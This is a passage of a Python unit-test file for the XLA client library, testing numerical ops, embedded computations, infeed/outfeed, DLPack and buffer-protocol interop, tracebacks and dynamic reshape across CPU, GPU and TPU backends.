ops.Fft(ops.Constant(c, a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.fftn(a, axes=(1, 2, 3))], rtol=1e-4)
# IFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.ifftn(a, axes=(1, 2, 3))], rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
ops.Fft(ops.Constant(c, b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.rfftn(b, axes=(1, 2, 3))], rtol=1e-4)
# IRFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(
c, expected=[np.fft.irfftn(a, axes=(1, 2, 3))], rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
ops.NextAfter(
ops.Constant(c, np.array([1, 2], dtype=np.float32)),
ops.Constant(c, np.array([2, 1], dtype=np.float32)))
out, = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(
np.array([eps + 1, 2 - eps], dtype=np.float32), out)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testRegularizedIncompleteBeta(self, dtype):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538],
dtype=dtype)
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606],
dtype=dtype)
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677],
dtype=dtype)
c = self._NewComputation()
ops.RegularizedIncompleteBeta(
ops.Constant(c, a), ops.Constant(c, b), ops.Constant(c, x))
expected = np.array(
[0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
self._ExecuteAndCompareClose(c, expected=[expected], rtol=2e-2)
tests.append(SingleOpTest)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantComputation(self, in_dtype, out_dtype):
"""Computation (A) -> B that returns a constant 1 for any input."""
c = self._NewComputation("constant_{}_{}_one".format(
in_dtype.__name__, out_dtype.__name__))
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=in_dtype)).with_major_to_minor_layout_if_absent())
ops.Constant(c, out_dtype(1))
return c.build()
def _CreateMulBy2Computation(self, dtype):
"""Computation (dtype) -> dtype that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
ops.Mul(
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=dtype)).with_major_to_minor_layout_if_absent()),
ops.Constant(c, dtype(2.0)))
return c.build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
ops.Mul(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0))))
return c.build()
def _CreateBinaryAddComputation(self, dtype):
"""Computation (dtype, dtype) -> dtype that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Add(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _CreateBinaryGeComputation(self, dtype):
"""Computation (dtype, dtype) -> bool that tests param0 >= param1."""
c = self._NewComputation("param0_ge_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Ge(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _MakeSample3DArray(self, dtype):
return np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]],
dtype=dtype)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testCall(self, dtype):
c = self._NewComputation()
ops.Call(
c,
self._CreateMulBy2Computation(dtype),
operands=(ops.Constant(c, dtype(5.0)),))
self._ExecuteAndCompareClose(c, expected=[10.0])
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(in_dtype.__name__, out_dtype.__name__),
"in_dtype": in_dtype,
"out_dtype": out_dtype,
} for in_dtype, out_dtype in [[np.float32, np.int32]])
def testMapEachElementToConstant(self, in_dtype, out_dtype):
c = self._NewComputation()
ops.Map(c,
[ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=in_dtype))],
self._CreateConstantComputation(in_dtype, out_dtype), [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1, 1, 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testMapMulBy2(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
ops.Map(c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 4.0, 6.0, 8.0]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSimpleMapChain(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
# Chains a map of constant-out with a map of mul-by-2
c = self._NewComputation()
const = ops.Map(
c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateConstantComputation(dtype, dtype), [0])
ops.Map(c, [const], self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 2.0, 2.0, 2.0]])
# TODO(b/154752816): bfloat16 crashes in evaluator.
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDivVectorsWithMap(self, dtype):
def DivComputation():
c = self._NewComputation("div_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Div(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
c = self._NewComputation()
ops.Map(c, (ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype)),
ops.Constant(c, np.array([5.0, 5.0, 4.0, 4.0], dtype=dtype))),
DivComputation(), [0])
self._ExecuteAndCompareClose(
c, expected=[[0.2, 0.4, 0.75, 1.0]], rtol=1e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSelectAndScatter(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
operand = ops.Constant(
c, np.array([[1., 2., 6.], [4., 5., 3.]], dtype=dtype))
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID,
c.get_shape(operand).dimensions(), window_dimensions, window_strides)
ops.SelectAndScatterWithGeneralPadding(
operand,
select=self._CreateBinaryGeComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding,
source=ops.Constant(c, np.array([[0.1, 0.2]], dtype=dtype)),
init_value=ops.Constant(c, np.array(1, dtype=dtype)),
scatter=self._CreateBinaryAddComputation(dtype))
self._ExecuteAndCompareClose(
c, expected=[[[1., 1., 1.2], [1.1, 1., 1.]]], rtol=5e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduce1DtoScalar(self, dtype):
c = self._NewComputation()
ops.Reduce(
c,
operands=[
ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))
],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[0])
self._ExecuteAndCompareClose(c, expected=[10])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}_dim{}".format(dtype.__name__, dim),
"dtype": dtype,
"dim": dim,
} for dtype in float_dtypes if dtype != bfloat16 for dim in range(2))
def testReduce2DTo1D(self, dtype, dim):
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[dim])
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dim)])
@parameterized.named_parameters({
"testcase_name": "_{}_dims[{}]".format(dtype.__name__, dims),
"dtype": dtype,
"dims": tuple(dims)
} for dtype in float_dtypes for dims in itertools.permutations(range(3)))
def testReduce3DAllPossibleWaysF32(self, dtype, dims):
input_array = self._MakeSample3DArray(dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=dims)
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dims)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowSameUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.SAME, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.], [4., 5., 6.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidGeneralStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 9.]]])
def testReduceWindowVariadic(self):
c = self._NewComputation("reducer")
shape = xla_client.shape_from_pyval(np.array(0, dtype=np.int32))
shape = shape.with_major_to_minor_layout_if_absent()
ps = [ops.Parameter(c, i, shape) for i in range(4)]
which = ops.Ge(ps[0], ps[2])
ops.Tuple(
c, [ops.Select(which, ps[0], ps[2]),
ops.Select(which, ps[1], ps[3])])
reducer = c.build()
key_array = np.array([[1, 5, 6], [4, 2, 3]], dtype=np.int32)
val_array = np.array([[7, 8, 9], [10, 11, 12]], dtype=np.int32)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, key_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operands=[ops.Constant(c, key_array),
ops.Constant(c, val_array)],
init_values=[
ops.Constant(c, np.int32(0)),
ops.Constant(c, np.int32(0))
],
computation=reducer,
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[4, 5, 6]], [[10, 8, 9]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testWhile(self, dtype):
def LessThan10Cond():
c = self._NewComputation("test_lt_10")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Lt(ops.Parameter(c, 0, shape), ops.Constant(c, dtype(10.)))
return c.build()
cond = LessThan10Cond()
body = self._CreateMulBy2Computation(dtype)
c = self._NewComputation()
init = ops.Constant(c, dtype(1.))
ops.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=[16.])
def testConditionalTrue(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(True))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[6.])
def testConditionalFalse(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(False))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[1.])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed[0]).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for item in to_infeed:
device.transfer_to_infeed(item)
for item in to_infeed:
result, = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertEqual(result, item)
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
device.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent())
x = ops.GetTupleElement(x_and_token, 0)
token = ops.GetTupleElement(x_and_token, 1)
outfeed_shape = xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent()
ops.OutfeedWithToken(x, token, outfeed_shape)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.execute([]))
execution.start()
device.transfer_to_infeed(want)
got = device.transfer_from_outfeed(outfeed_shape)
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
ops.Scatter(
ops.Constant(c, a), ops.Constant(c, scatter_indices),
ops.Constant(c, updates), self._CreateBinaryAddComputation(np.int32),
dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]],
dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=[expected])
class DeviceTest(ComputationTest):
def testPlatform(self):
for device in self.backend.local_devices():
self.assertEqual(device.platform, self.backend.platform)
tests.append(DeviceTest)
class ErrorTest(ComputationTest):
def setUp(self):
super(ErrorTest, self).setUp()
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return self.backend.compile(c.build(), compile_options=options)
self.assertRaisesRegex(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
def TestFun():
return xla_client.execute_with_python_values(
self.backend.compile(c.build()), [self.f32_scalar_2], self.backend)
self.assertRaisesRegex(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
tests.append(EmbeddedComputationsTest)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(ComputationRootTest)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = xla_client.OpSharding.Type.REPLICATED
sharding.tile_assignment_dimensions = [1]
sharding.tile_assignment_devices = [0]
c.set_sharding(sharding)
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
c.clear_sharding()
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(SetShardingTest)
testcase_shapes = [
(),
(1,),
(2, 3),
(2, 0),
(0, 7),
(4, 1, 2),
(2, 1, 3),
(2, 4, 1),
(3, 1),
(1, 3),
]
def FormatShapeAndDtype(shape, dtype):
return "_{}[{}]".format(np.dtype(dtype).name, ",".join(map(str, shape)))
class DLPackTest(parameterized.TestCase):
def setUp(self):
super(DLPackTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform not in ("cpu", "gpu"):
self.skipTest("DLPack requires CPU or GPU")
self.cpu_backend = (
self.backend
if self.backend.platform == "cpu" else xla_client.make_cpu_client())
self.gpu_backend = (
self.backend if self.backend.platform == "gpu" else None)
# pylint: disable=g-complex-comprehension
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "{}_own={}_gpu={}".format(
FormatShapeAndDtype(shape, dtype), take_ownership, gpu),
"dtype": dtype,
"shape": shape,
"take_ownership": take_ownership,
"gpu": gpu
} for dtype in dlpack_dtypes for shape in testcase_shapes
for take_ownership in [False, True]
for gpu in [False, True])
# pyformat: enable
def testRoundTrip(self, dtype, shape, take_ownership, gpu):
if gpu and self.gpu_backend is None:
raise unittest.SkipTest("Test not running with GPU support")
backend = self.gpu_backend if gpu else self.cpu_backend
if dtype == np.bool_:
x = np.random.randint(0, 2, size=shape).astype(np.bool_)
else:
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
buffer = backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=take_ownership)
del buffer # Free "buffer" to make sure dlt retains ownership.
self.assertEqual(type(dlt).__name__, "PyCapsule")
y = xla_client._xla.dlpack_managed_tensor_to_buffer(
dlt, self.cpu_backend, self.gpu_backend)
np.testing.assert_array_equal(
x.astype(np.uint8) if dtype == np.bool_ else x, y.to_py())
def testTensorsCanBeConsumedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def ConsumeDLPackTensor():
_ = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
ConsumeDLPackTensor()
self.assertRaisesRegex(
RuntimeError, ".*a DLPack tensor may be consumed at most once.*",
ConsumeDLPackTensor)
def testTensorsCanBeOwnedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
self.assertTrue(buffer.is_deleted())
with self.assertRaisesRegex(
RuntimeError,
"Cannot convert deleted/invalid buffer to DLPack tensor.*"):
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def testNonOwnedDlpackCanBeViewedTwice(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
d1 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
d2 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
y = xla_client._xla.dlpack_managed_tensor_to_buffer(d1, self.backend)
z = xla_client._xla.dlpack_managed_tensor_to_buffer(d2, self.backend)
del d1, d2
np.testing.assert_array_equal(x, buffer.to_py())
np.testing.assert_array_equal(x, y.to_py())
np.testing.assert_array_equal(x, z.to_py())
tests.append(DLPackTest)
class BufferProtocolTest(parameterized.TestCase):
def setUp(self):
super(BufferProtocolTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform != "cpu":
self.skipTest("Test requires CPU")
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in standard_dtypes if dtype != bfloat16
for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
x_ptr = x.__array_interface__["data"][0]
buffer = self.backend.buffer_from_pyval(
x, host_buffer_semantics=xla_client.HostBufferSemantics.ZERO_COPY)
y = np.array(buffer, copy=False)
y_ptr = y.__array_interface__["data"][0]
np.testing.assert_array_equal(x, y)
# If the input was sufficiently aligned, the input and output should
# alias.
self.assertTrue((x_ptr & 15) != 0 or x_ptr == y_ptr)
self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())
during_call = xla_client.HostBufferSemantics.IMMUTABLE_ONLY_DURING_CALL
buffer2 = self.backend.buffer_from_pyval(
x, host_buffer_semantics=during_call)
z = np.array(buffer2, copy=False)
self.assertNotEqual(x.__array_interface__["data"][0],
z.__array_interface__["data"][0])
def testDeleteWithActiveView(self):
x = np.random.randn(20, 10)
buffer = self.backend.buffer_from_pyval(x)
buffer_ptr = buffer.unsafe_buffer_pointer()
y = np.array(buffer, copy=False)
buffer.delete()
# It is still legal to access `y`; the array view must keep it alive.
np.testing.assert_array_equal(x, y)
self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)
tests.append(BufferProtocolTest)
class TracebackTest(absltest.TestCase):
def setUp(self):
super(TracebackTest, self).setUp()
self.backend = xla_backend()
def testNoTracebacksIfDisabled(self):
with xla_client.tracebacks(enabled=False):
self.assertEqual(None, xla_client.Traceback.get_traceback())
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertEqual(None, buffer.traceback)
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertEqual(None, e.traceback)
def assertIsTracebackContaining(self, tb, function):
self.assertIsInstance(tb, xla_client.Traceback)
self.assertIn(function, str(tb))
self.assertTrue(any(f.function_name == function for f in tb.frames))
def testTracebacks(self):
with xla_client.tracebacks(enabled=True):
tb = xla_client.Traceback.get_traceback()
self.assertIsTracebackContaining(tb, "testTracebacks")
# Tracebacks are not implemented on the TPU driver extension's variant
# of buffers and executables.
if not isinstance(self.backend, xla_client.Client):
return
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertIsTracebackContaining(buffer.traceback, "testTracebacks")
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertIsTracebackContaining(e.traceback, "testTracebacks")
def testNestedFunction(self):
def AFunction():
def AnotherFunction():
return xla_client.Traceback.get_traceback()
return AnotherFunction()
with xla_client.tracebacks(enabled=True):
tb = AFunction()
self.assertIsInstance(tb, xla_client.Traceback)
frames = tb.frames
i = next(
i for (i, f) in enumerate(frames) if f.function_name == "AFunction")
self.assertEqual(frames[i - 1].function_name, "AnotherFunction")
self.assertEqual(frames[i + 1].function_name, "testNestedFunction")
tests.append(TracebackTest)
class ClientTest(ComputationTest):
def setUp(self):
super(ClientTest, self).setUp()
self.backend = xla_backend()
def testPlatformVersion(self):
version = self.backend.platform_version
logging.info("platform_version:\n%s", version)
if self.backend.platform == "cpu":
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "gpu":
# Following is false if not built with --config=cuda
if test_util.is_gpu_available(cuda_only=True):
self.assertTrue(
re.match(r"^cuda \d{4,}$", version),
msg=f"Expected CUDA version string; got {repr(version)}")
else:
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "tpu" and not cloud_tpu:
self.assertIn("tpu", version.lower())
self.assertIn("cl/", version)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
def testExecutableSerialization(self):
if self.backend.platform != "tpu":
self.skipTest("Test requires tpu platform")
c = self._NewComputation()
ops.Add(
ops.Constant(c, NumpyArrayS32([1, 2])),
ops.Constant(c, NumpyArrayS32([3, 4])))
options = xla_client.CompileOptions()
executable = self.backend.compile(c.build(), options)
self.assertLen(executable.hlo_modules(), 1)
serialized = self.backend.serialize_executable(executable)
deserialized = self.backend.deserialize_executable(
serialized,
executable.hlo_modules()[0], options)
expected, = xla_client.execute_with_python_values(executable, (),
self.backend)
actual, = xla_client.execute_with_python_values(deserialized, (),
self.backend)
self.assertTrue(np.all(actual == expected))
tests.append(ClientTest)
# TODO(b/182461453): Add TFRT and cloud TPU implementation of
# ReadDynamicShapes
class DynamicReshapeTest(ComputationTest):
"""Tests related to DynamicReshape."""
def _CompareToPyAndBufferProtocol(self, builder, args, expected_results,
test_fn):
compiled = self.backend.compile(builder.build())
output_buffers = compiled.execute([
self.backend.buffer_from_pyval(
arg, device=compiled.local_devices()[0]) for arg in args
])
self.assertLen(output_buffers, len(expected_results))
for buf, expected in zip(output_buffers, expected_results):
to_py_result = buf.to_py()
self.assertEqual(expected.shape, to_py_result.shape)
test_fn(expected, to_py_result)
if self.backend.platform == "cpu" and buf.dtype != bfloat16:
mview = memoryview(buf)
self.assertEqual(expected.shape, mview.shape)
test_fn(expected, np.asarray(mview))
else:
# Buffer protocol expected to fail on non-cpu platforms and bfloat16
# Note that np.asarray(buf) doesn't throw an exception. To test if the
# error was thrown properly we must use memoryview(buf).
with self.assertRaises(BufferError):
memoryview(buf)
# 1D reshape to the full size, a partial size, and size 0.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.parameters((5), (3), (0))
def testReshape1D(self, reshape_size):
full_size = 5
c = self._NewComputation()
arg = np.array(reshape_size, dtype=np.int32)
expected = np.array(range(reshape_size), dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
ops.DynamicReshape(
ops.Constant(c, NumpyArrayS32(range(full_size))), [p], [full_size],
[True])
self._CompareToPyAndBufferProtocol(c, [arg], [expected],
np.testing.assert_equal)
# 2D reshape with a slice on the minor dimension. We test different types
# where the strides may differ between the host and devices. The reshaped
# physical memory layout is not consecutive, and we test if the program can
# return the correct logical view of the data.
